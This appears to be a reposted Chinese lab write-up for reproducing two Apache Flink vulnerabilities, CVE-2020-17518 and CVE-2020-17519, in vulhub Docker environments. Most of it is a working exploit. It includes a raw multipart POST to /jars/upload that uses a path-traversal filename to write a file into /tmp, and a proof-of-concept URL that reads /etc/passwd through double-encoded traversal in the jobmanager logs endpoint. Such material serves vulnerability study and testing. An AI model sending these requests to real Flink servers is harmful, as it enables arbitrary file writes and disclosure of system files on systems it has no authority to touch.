文章来源:TimeLine
https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518
cd vulhub-master/flink/CVE-2020-17518
安装环境
sudo docker-compose up -d
接着访问http://your-ip:8081
https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519
进入目录
cd vulhub-master/flink/CVE-2020-17519
sudo docker-compose up -d
CVE-2020-17518
POST /jars/upload HTTP/1.1
Host: localhost:8081
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (X11; Linux x86_64;rv:78.0) Gecko/20100101 Firefox/78.0
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Length: 187
------WebKitFormBoundaryoZ8meKnrrso89R6Y
Content-Disposition: form-data;name="jarfile"; filename="../../../../../../tmp/success"
success
------WebKitFormBoundaryoZ8meKnrrso89R6Y--
cd vulhub-master/flink/CVE-2020-17518
docker ps
docker exec -it CONTAINER ID bash
ls /tmp
POC:
http://ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
参考链接:
推荐文章++++